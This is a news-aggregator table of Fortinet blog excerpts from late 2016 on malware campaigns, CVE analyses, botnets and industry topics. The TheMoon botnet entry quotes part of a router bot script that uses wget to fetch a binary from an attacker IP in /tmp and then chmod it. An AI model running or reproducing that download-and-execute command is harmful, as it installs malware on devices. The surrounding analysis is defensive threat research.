What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2016-11-14 10:11:13 | Cybersecurity In this New Political Era (lien direct) | The next President of the United States will begin their term in the midst of dramatic transitions happening across the world. This isn't about the deficit or foreign policy or climate change. Advisors well versed in strategies related to those issues surround the President. What needs to be addressed is the global transition to a digital economy. This change is affecting every aspect of our society, from how businesses generate profit to how individuals live their lives and interact socially. The digital economy and society combine technolo | |||
|
2016-11-11 09:02:37 | Q&A With FortiVeteran Program Graduate Chris Armstrong (lien direct) | Veteran's Day is a great opportunity to feature a “graduate†of our Fortinet Veterans Program, which attempts to help fill the cybersecurity talent gap by helping veterans transition from the armed forces back into a civilian job in the realm of cyber security. Today we spotlight Chris Armstrong, a former Marine Officer who was stationed at Camp Pendleton in California. You can also read about other graduates from the program on our blog. Can you give us a summary of your background in the military? I was a Communications... | |||
|
2016-11-10 17:37:53 | Unmasking the Bonasira Cyperine Author (lien direct) | Following our research on Cyperine 2.0 and Next Man History Stealer, the malware author rebranded their info stealer as Medusa. While it basically has the same featurse as Cyperine, you now need a valid account to access the builder. The example below compares Cyperine on the left and Medusa on the right, which shows a user logged in as Deadzeye. Figure 01. Builder comparison between Cyperine (Left) and Medusa (Right) The builder signatures clearly show that both of these variants were made by the same author, who goes by the name... | |||
|
2016-11-09 09:28:23 | Fabric-Ready: Q&A with Ziften\'s Josh Applebaum (lien direct) | Fortinet recently sat down with Fabric-Ready Partner Ziften to learn what's top of mind for its customers, the key IT challenges they are facing, and how Ziften's approach to integrated security is helping drive business and customer success. Tell us a bit about Ziften's business and the types of customers that you serve. Ziften provides client-to-cloud visibility and security, offering unprecedented access to user behavior, system, application, and network data originating from client devices, data centers, and the cloud.... | |||
|
2016-11-08 10:49:54 | Analysis of ISC BIND DNAME Answer Handling DoS (CVE-2016-8864) (lien direct) | A defect in BIND's handling of a DNAME answer was fixed in a critical update from the Internet Systems Consortium (ISC) several days ago. This defect affects all BIND recursive servers, and can be exploited to remotely take down recursive servers by sending a simple DNAME answer thereby causing a denial of service (DoS.) This potential DoS vulnerability is caused by an assertion failure in Resolver.c or Db.c when caching the DNS response with DNAME Record. In this post we will examine the underlying code and expose the root cause of this... | |||
|
2016-11-08 10:13:07 | Why Healthcare Security Breaches Are Big Wins for Cybercriminals (lien direct) | Healthcare security breaches can be extremely rewarding for cybercriminals. Read this post to find out why. | |||
|
2016-11-07 09:12:27 | Shopping at the Online Blackmarketplace (lien direct) | Malware and hacking services are becoming commoditized. Ransomware as a service has become popular this year. More effective security tools have cybercriminals looking for new tools and techniques to more effectively target victims and bypass security. And malware developers are continually looking for new markets where they can connect and sell their services. In the past, we have discussed the rise of the DarkNet as a cybercrime marketplace. But the reality is that many attackers simply use sites such as eBay, Craigslist, and other well-known... | |||
|
2016-11-03 08:56:56 | Don\'t Call Me an Expert, Call Me a Hacker (lien direct) | This is the third blog in a series titled WhiteHat, chronicling the most pressing questions about what it really means to be a hacker, the moral dilemma that white hat hackers face, and what a profession in cybersecurity is really all about. Read more stories from the hackers at Fortinet here.  I recently sat down with Kushal Shah, a security researcher in Fortinet's FortiGuard Labs research division. Kushal sheds light on his interest in cybersecurity and how he became a white hat hacker by trade. Q: Hi Kushal,... | |||
|
2016-11-02 21:03:05 | The Angry Spam and The Tricky Macro Delivers Updated Hancitor (lien direct) | Hancitor is one of the better-known malware downloaders due to its numerous SPAM runs and evolving delivery technique. It reminds us of Upatre, which gained notoriety status over the past two years but has now died down, possibly due to the takedowns of its major payloads. In the case of Hancitor, it still seen as a favourite carrier of very much active malware families such as Pony and Vawtrak. Just recently, we found a new spam campaign of Hancitor with some notable developments that may have been in the previous variants, but were not discussed... | |||
|
2016-11-01 08:46:14 | Recent Security Trends We\'ve Seen in Financial Services (lien direct) | The financial services industry is always looking at the latest trends to better protect their data. Read this post to learn what's happening today. | |||
|
2016-11-01 08:41:43 | Android banking malware masquerades as Flash Player, targeting large banks and popular social media apps (lien direct) | Active users of mobile banking apps should be aware of a new Android banking malware campaign targeting customers of large banks in the United States, Germany, France, Australia, Turkey, Poland, and Austria. This banking malware can steal login credentials from 94 different mobile banking apps. Due to its ability to intercept SMS communications, the malware is also able to bypass SMS-based two-factor authentication. Additionally, it also contains modules to target some popular social media apps. Install the malware The malware masquerades... | |||
|
2016-10-31 14:32:33 | The First Major Update of Cerber 4 Ransomware Has Surfaced (lien direct) | Cerber 4.1.0 is already here! In this blog we will share information about this updated version uncovered by Fortinet, including its differences and similarities compared to previous versions. Cerber is a classic ransomware tool that encrypts victims' files and then demands payments to decrypt them. Victims are given a period of time for making the payments and then (hopefully) having their original unencrypted files restored. Cerber marks encrypted files with a specific extension. In previous versions (Cerber 2 and 3), encrypted... | |||
|
2016-10-31 10:30:15 | IoT-based Linux/Mirai: Frequently Asked Questions (lien direct) | Ever since the Mirai DDoS attack was launched a few weeks ago, we have received a number of questions that I will try to answer here. If you have more follow-up questions, please let me know! Who is the Author of Mirai? The presumed developer goes under the pseudonym of 'Anna Senpai' on Hackforums - an English-speaking hacker forum. His/her account on the forum is recent (July 2016). and was probably created when he/she started working on Mirai. For example: July 10 - Begins "killing QBots" August... | |||
|
2016-10-31 09:17:19 | The Challenge of E-Voting (lien direct) | Countries where open elections occur have often developed arcane rules and processes for casting, collecting, and tabulating votes, in part because counting and managing votes is so time-consuming. But also because different groups, especially those with power, have strongly vested interests not only in the outcome, but also in the process itself. In the US, for example, Americans voting in the current Presidential election don't actually vote for Presidential candidates, but for slates of “electors†pledged to support those... | |||
|
2016-10-31 08:27:26 | Microsoft Kernel Integer Overflow Vulnerability (lien direct) | Last month I discovered and reported an integer overflow vulnerability in the Windows Registry. Last Tuesday, October 25th, Microsoft released Security Bulletin MS16-124, which contains the patch for this vulnerability, and identifies it as CVE-2016-0070. This vulnerability could lead to local privilege elevation, and is rated as “Important” by Microsoft. The vulnerability affects multiple Windows versions, and Microsoft has recommended installing this update immediately. In this blog I will share the details of this vulnerability. How... | Guideline | ||
|
2016-10-28 08:30:20 | On Email\'s Birthday, Here\'s a Look at How to Keep it Safe (lien direct) | On the anniversary of the first email transmission, we look at how email has evolved over the years, and how to keep it as an essential tool going forward, despite the growing and increasingly sophisticated dangers of e-mail-based malware and other email-borne threats. What some consider to be the first email – the first electronic message sent between two computers – was transmitted on this day exactly 47 years ago, on October 29, 1969. The exchange, from a computer at UCLA to one at Stanford Research Institute, took place over the... | |||
|
2016-10-27 13:53:06 | Joomla – From No One to the Highest Privilege (lien direct) | Joomla, a popular free and open-source content management system, just released version 3.6.4 that fixed two critical vulnerabilities: [CVE-2016-8870] - Core - Account Creation: attackers can exploit this vulnerability to create any account in a Joomla system regardless of whether its registration has been disabled. [CVE-2016-8869] - Core - Elevated Privileges:Â with the vulnerability above, an attacker not only can register an account in a vulnerable system, but also register with the highest privilege – Administrator. CVE-2016-8870... | |||
|
2016-10-27 13:24:46 | Microsoft and Fortinet Extend Partnership to Secure Mission-Critical Workloads in Azure Government Cloud (lien direct) | Fortinet and Microsoft today announced an extension of their partnership to protect the cloud environments of their joint government customers. The US Federal Government sets the world’s highest security standards for data protection. Other public institutions, like state and local governments, police, and fire departments, follow these standards as well to protect the citizenry they serve. Partnering to Deliver Cloud Security for Government Organizations Fortinet and Microsoft are committed to delivering world-class security to... | |||
|
2016-10-27 10:38:41 | Driverless Cars: A New Way of Life Brings a New Cybersecurity Challenge (lien direct) | Cars are an essential part of our everyday life, and are crucial for transporting millions of commuters through towns and cities, and even from one country to another, on a daily basis. With “smart†vehicles increasingly playing a major role in our day-to-day lives, it's no surprise that semi- and fully autonomous transportation, and the potential for driverless cars have become hot topics. According to Gartner, driverless vehicles will represent approximately 25 percent of the passenger vehicle population in use in mature markets... | |||
|
2016-10-26 08:57:00 | The Glider (lien direct) | This is the second blog in a series titled WhiteHat, chronicling the most pressing questions about what it really means to be a hacker, the moral dilemma that white hat hackers face, and what a profession in cybersecurity is really all about. Read more stories from the hackers at Fortinet here. When you run a search for the term “Hackers†you will most certainly come across (1) the 1995 film Hackers, (2) a lengthy Wikipedia article or disambiguation page, and (3) the timeless book Hackers: Heroes of the Computer Revolution (recommended). Among... | |||
|
2016-10-25 15:55:43 | Scaling the Cloud: OpenStack and Security (lien direct) | OpenStack is the open-source cloud management platform software that can be used to build a low-cost private cloud for development, and cloud infrastructure as a service (IaaS) offering. Enterprises are also turning to OpenStack for data center and cloud deployment alternatives. Fortinet’s Cynthia Hsieh offers some perspective about OpenStack and security today. Can you talk high level about what customers are considering in regards to the cloud today? Beyond virtualization, organizations are beginning to plan and implement next-generation,... | |||
|
2016-10-25 11:27:18 | Hack.lu 2016 Wrap-Up (lien direct) | This year again I attended Hack.Lu 2016. Let it be free workshops, CTF, lightning or regular talks, there are many ways to learn new stuff. Not to mention the kind and informal atmosphere of the conference. Let me give you an example which perfectly illustrates the atmosphere: during lunch time, I started talking Bluetooth Low Energy with a fellow researcher (@virtualabs). And... we ended up tearing down his connected toothbrush! Figure 1. Toothbrush teardown I told him about my findings (demoed at VB 2016) remote controlling the toothbrush... | |||
|
2016-10-24 10:54:41 | "Locky Happens: Notorious Ransomware Leaves an Unpleasant Trace" (lien direct) | We attended the recent VB 2016 conference to present our findings on the development and evolution of Locky ransomware. In that same presentation we also discussed an automation system designed by Fortiguard to extract its configuration and hunt for new variants. Locky-ly (*wink*), while improving the system we couldn’t help but notice another new variant. Actually, aside from the encrypted file name extension change, there are no major developments from the “.odin” variant in this new variant. However, it appears that criminals... | |||
|
2016-10-24 10:46:24 | Mirai Botnet Protect Your Infrastructure with FortiDDoS (lien direct) | As further details become available for the massive distributed denial of service attack against Dyn on Oct 21 2016, here are some things FortiDDoS customers can do to protect themselves from a potential Internet of Things (IoT) botnet-based DDoS attack like Mirai. Mirai spreads by compromising vulnerable IoT devices such as DVRs. Many IoT manufacturers failed to secure these devices properly, and they don't include the memory and processing necessary to be updated. They are also usually not in control of the destination of their outbound... | |||
|
2016-10-24 10:36:43 | IoT malware are coming. Will you listen to me now? (lien direct) | It happened again. This past weekend we witnessed another record-setting DDoS attack, probably primarily caused by infected IoT devices. This attack is attributed to the same piece of code - Linux/Mirai - which attackedKrebsOnSecurity.com and OVH in September. List of Attacks Attributed to Linux/Mirai Date Where Rate Comments Oct 21, 2016 Dyn DNS ? Some of the attacks were coming from hosts infected... | |||
|
2016-10-24 10:25:12 | Information-stealing Malware Is Spread Via Word Document (lien direct) | Recently we received a SPAM with an attachment, which is a password-protected Word document. Its MD5 is 6619356e9e0c9d2445bf777a8bea5d6a, which is detected as “WM/Agent.60F9!tr” by the Fortinet AntiVirus service. When the document is opened, the attached malicious VB script code is executed and additional malware is created and executed. Based on our analysis, this is information-stealing malware. In this blog, we’ll show you how the malware works, what information is stolen from a victim’s system, and how the stolen data... | |||
|
2016-10-21 15:33:02 | When Half the Internet Goes Down Due to a Cyber-Assault on DNS Infrastructure (lien direct) | On Oct 21, 2016, yet another cyber assault happened on a large DNS provider's infrastructure, bringing down websites and services on the east coast of the United States. While it is easy to launch these attacks, the solutions available in the market have not kept pace. FortiDDoS is the only hardware logic solution in the market today that easily distinguishes between attack traffic and legitimate traffic at high rates and keep services up during such attacks. The DDoS attack on the DNS infrustructure of Dyn, a major DNS provider,... | |||
|
2016-10-21 11:36:21 | Fortinet Researchers Discover Two Critical Vulnerabilities in Adobe Acrobat and Reader (lien direct) | Fortinet researchers recently discovered two critical zero-day vulnerabilities in Adobe Acrobat and Reader. They are identified as CVE-2016-6939 and CVE-2016-6948. Adobe released a patch to fix these vulnerabilities on October 6, 2016. CVE-2016-6939 This vulnerability was discovered by Kai Lu. CVE-2016-6939 is a heap overflow vulnerability. The vulnerability is caused by a crafted PDF file which causes an out of bounds memory access due to an improper bounds check when manipulating an array pointer. The specific vulnerability exists... | |||
|
2016-10-21 11:09:56 | 4 Motives Behind Why the Healthcare Security Market is Surging (lien direct) | The healthcare security market is flourishing due to a number of recent trends. Read this post to find out more. | |||
|
2016-10-20 08:52:50 | TheMoon - A P2P botnet targeting Home Routers (lien direct) | In the post “Home Routers - New Favorite of Cybercriminals in 2016â€, we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year. In this post we will dissect a bot installed on the affected ASUS routers. The following figure shows attack traffic captured through Wireshark. Figure 1 Exploitation of CVE-2014-9583 Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1 chmod... | |||
|
2016-10-19 11:33:40 | "JapanLocker": An Excavation to its Indonesian Roots (lien direct) | Fortinet has discovered a new open-source PHP ransom malware that has been targeting web sites using a simple encryption algorithm that is effective enough to really frighten web server owners. What is more interesting, however, is the information we have uncovered regarding the possible roots of the attacks/attackers. Basing only on the email address that it uses for ransom negotiations, “japanlocker@hotmail.com”, victims and researchers alike may make an obvious guess where the attacks may have come from. However, our investigation... | |||
|
2016-10-19 08:40:02 | The Killer App For Cloud: Accelerating the Deployment of NFV Solutions (lien direct) | “The cloud,†a word that used to cause network folks to roll their eyes, is now a reality. Public cloud architectures are quickly becoming the backbone, no pun intended, of the corporate IT infrastructure. There are some compelling reasons for this. The first that comes to most people's minds is price, but that's not really true. The greatest misnomer of “the cloud†is that it is cheap, although it may be inexpensive to try out, or to put minor business assets in the cloud. For small businesses, it is a panacea.... | |||
|
2016-10-18 13:23:32 | Fortinet Fabric Ready Program- More Open than Ever (lien direct) | On September 26th, Fortinet announced our new Fortinet Fabric Ready Program, which delivers on the “Open†attribute of the Fortinet Security Fabric by providing threat intelligence visibility across multi-vendor cybersecurity solutions. Cross-product  coordination (regardless of vendor) is a critical capability for today's enterprises, as it is rare for an organization to completely source all IT security components from a single vendor across the entirety of their network and covering all attack vectors. Leaving... | |||
|
2016-10-18 10:10:34 | Virus Bulletin 2016 Denver Wraps Up (lien direct) | VB 2016 Conference was held this year at the Hyatt Regency Hotel in Denver, CO, USA. This conference is an annual event where IT security researchers from around world gather to share their knowledge, learn, and discuss trends in the global threat landscape. This year we had the privilege to attend as well as meet, hang out with, and share ideas with some of the field’s top researchers. The conference scheduled a great lineup of speakers and presentations, so it was tough to pick which topic to attend. We are going to share some here some... | |||
|
2016-10-17 11:59:12 | IBM Rational Collaborative Lifecycle Management XSS Vulnerability (lien direct) | Summary At the beginning of this year, I discovered and reported a Cross-Site Scripting (XSS) vulnerability in IBM Rational Collaborative Lifecycle Management (CLM). This month IBM released a security bulletin that contains the fix for this vulnerability. In this blog, I want to share the details of this vulnerability. How to Reproduce To reproduce this vulnerability, you can follow the steps below: Sign into CLM with a user account, such as “chbest2â€, with the permission "JazzAdmins". Then create a new user... | |||
|
2016-10-17 08:31:12 | Securing Next-Generation Data Centers (lien direct) | Data Centers are undergoing the most radical transformation since they were first created. For decades, they were walled off and isolated vaults containing some of an organization's most valued assets. Only a handful of data center shamans were authorized to query that data center for information. It's no coincidence that that largest data center vendor in the world is named Oracle. But today, everyone from executives to employees and consultants to even customers now have access to data center resources, often using homegrown applications... | |||
|
2016-10-14 13:31:10 | Fortinet Achieves VMware Readyâ„¢ Status for Network Functions Virtualization! (lien direct) | Network Functions Virtualization (NFV) offers unprecedented opportunities for service providers to adopt new business models, radically lower costs and increase the speed of innovation and delivery of next-generation services. While the potential benefits of NFV are enormous, ensuring effective security is a key consideration for service providers. Protecting these highly dynamic environments requires a Security Fabric with tightly integrated security and network technologies that share intelligence, and collaborate to detect, isolate, and respond... | |||
|
2016-10-14 11:10:28 | A Brazilian Trojan Using A Jar File, VB Scripts And A DLL For Its Multi-Stage Infection (lien direct) | As part of Fortinet's continued efforts to protect its customers, we carry out a variety of tests to improve the detection of malicious content, whether it's file or network related. While checking out some HTTPS phishing websites last month, one URL stood out. It wasn't a phishing site, but it downloaded a file called BR52357896253ex.zip (which is detected as “Java/Banload.BD!tr†by Fortinet AntiVirus service) from a file sharing website. The compressed file also contained a Jar that downloaded additional files,... | |||
|
2016-10-14 09:07:13 | Fortinet Fabric-Ready Partner Spotlight: Q&A with Pamela Cyr, Senior Vice President of Business Development at Tufin (lien direct) | Fortinet recently sat down with Fabric-Ready Partner Tufin to learn what's top of mind for its customers, the key IT challenges they are facing, and how Tufin's approach to integrated security is helping drive business and customer success. Tell us a bit about Tufin's business and the types of customers that you serve. Tufin is the market-leading provider of network security policy orchestration solutions, which enable enterprises to streamline the management of security policies across private, public, and hybrid cloud... | Guideline | ||
|
2016-10-14 09:06:37 | Pebble Smartwatch Talk at Virus Bulletin 2016 (lien direct) | My personal favorite talk was on exploiting Pebble smartwatches ("Exploit Millions of Pebble Smartwatches for Fun and Profit" by Zhang and Wei). Our expectations are usually higher in one's own field of expertise, but this one is really great work. Pebble smartwatch talk at VB 2016 Basically, the authors found an inner assembly routine in Pebble's operating system which allows to elevate one's privileges. If you are familiar with ROP, this is a privilege elevation gadget. Normally, this routine is called by Pebble... | |||
|
2016-10-13 09:07:02 | NSS Labs 2016 NGIPS Group Testing (lien direct) | NSS Labs 2016 NGIPS Group Testing Fortinet is highly committed to the public testing of its products and solutions because it helps us to continuously improve our products and provide the best technology to our customers. We participate in dozens of tests across a spectrum of labs and approaches. In the most recent NSS Labs Next-Generation Intrusion Prevention System (IPS) group test, Fortinet received an almost perfect score with an overall rating of 99.6%. However, during testing an issue was identified that resulted in an evasion... | |||
|
2016-10-12 17:02:42 | Analysis of OpenSSL Large Message Size Handling Use After Free (CVE-2016-6309) (lien direct) | OpenSSL released an emergency security update shortly after a patch was issued a few weeks ago. This security update addresses a critical Use After Free vulnerability introduced by the updated code that revised to resolve the earlier low severity vulnerability CVE-2016-6307. This critical Use After Free vulnerability (CVE-2016-6309) is caused by an error that occurs when relocating a message with an overlarge message size greater than 16k. Remote attackers may access the freed buffer to crash, or potentially even execute arbitrary code on vulnerable... | |||
|
2016-10-12 11:35:26 | Home Routers - New Favorite of Cybercriminals in 2016 (lien direct) | Fortinet has been monitoring the outbreak of attacks targeting home routers over the past several months. We plan to post a series of blogs to share our findings. In this post, we review the related statistical data that has been recorded by Fortinet. Since July of this year, it has not been uncommon for signatures detecting vulnerabilities in home routers to take up three spots in our daily top 10 IPS detection list. An analysis of these three signatures is provided below. 1. Netcore.Netis.Devices.Hardcoded.Password.Security.Bypass The... | |||
|
2016-10-12 08:43:17 | Financial Services Cybersecurity Checklist: Staying Ahead of the Curve (lien direct) | The financial services industry is consistently under attack. Review this cybersecurity checklist to make sure your organization is prepared. | |||
|
2016-10-11 14:36:20 | OffensiveWare: A New Malware-as-a-Service Platform Takes a Fitting Label (lien direct) | In recent years, with the active efforts of law enforcements to takedown infamous Trojan spywares such as Dridex and GameOver Zeus, one could claim that their status as a predominant threat has died down and given way to ransom malware. But this has not not stopped small groups of individuals from trying to keep this lineage of malware alive. The increasing popularity of Malware-as-a-Service (MaaS) platforms has provided a new way for criminals to keep themselves on the malware profit chain by enticing a wider audience with their malicious... | |||
|
2016-10-10 09:12:10 | Students, Veterans Address Talent Gap (lien direct) | Anyone who has tried to hire a security professional understands that there is a serious shortage of people with the skills needed to plan, design, implement, and manage a cybersecurity strategy. In fact, according to ESG's “2016 IT Spending Intentions Survey,” 46 percent of organizations now claim that they have a problematic shortage of cybersecurity skills. The question everyone in the industry is asking is: Where will we find the folks to fill this gap? Networks are undergoing dramatic transformations – fueled by BYOD,... | |||
|
2016-10-10 08:57:03 | Q&A: How Fortinet is Helping Retailers Meet PCI DSS Requirements (lien direct) | With so many high profile security breaches of large retailers in the news recently, a hot topic everywhere is around PCI DSS, the Payment Card Industry Data Security Standards. We recently spoke with Nirav Shah, Fortinet's Director of Product Marketing – Enterprise Security, for his take on PCI DSS requirements, and how the FortiGate family of security products can help retailers secure their stores and meet these standards. A Q&A with Nirav Shah What is PCI DSS, and what do organizations need to do to comply with these requirements? PCI... | |||
|
2016-10-07 14:23:09 | Security\'s Reactive Response to the Cycle of Threats (lien direct) | We're into the final quarter of the year, and the cyberthreat landscape continues to be interesting. This week in the Fortinet Threat Intelligence Brief we looked at a number of interesting trends around IoT botnets, continued ransomware problems – both through directed attacks and infected websites, and the spoofing of the Navy Federal US Credit Union. One interesting thing to note is how attacks tend to move from target to target and region to region in waves. This week, for example, we saw a 4X spike in attempts to deliver... | |||
|
2016-10-07 08:56:41 | Next Gen Lock: the Good, the Bad, and the Smart, Part II: Fortinet Analysis (lien direct) | Part II: Fortinet Analysis Developing our own opinion In part one of this two-part series, I provided an overview of smart lock technology and some of its vulnerabilities and risks. We also decided to 'try our luck' with the security of these solutions in the Fortinet FortiGuard Lab, so we ordered some random brand smart locks for testing. Two of our main vulnerability researchers, Tony Loi and Tien Phan, were able to do some in-depth analysis these last few weeks. Not only were they able to confirm the attacks demonstrated by... | |||
|
2016-10-06 10:23:45 | Next Gen Lock: the Good, the Bad, and the Smart, Part I: The Problem (lien direct) | Part I: The Problem About 4000 years ago, as we began the development of our modern way of life, people started to also want their own privacy and the ability to safeguard their possessions. The lock and key concept was created at that time. The first were made with hardwoods, then metals. Some were amazingly intricate. But eventually, they evolved to become the latest iteration of that ancient concept, something we have seen developing over the last few years: the smart lock. The key has been replaced by your smartphone or smartwatch, but the... |
To see everything:
Our RSS (filtrered)
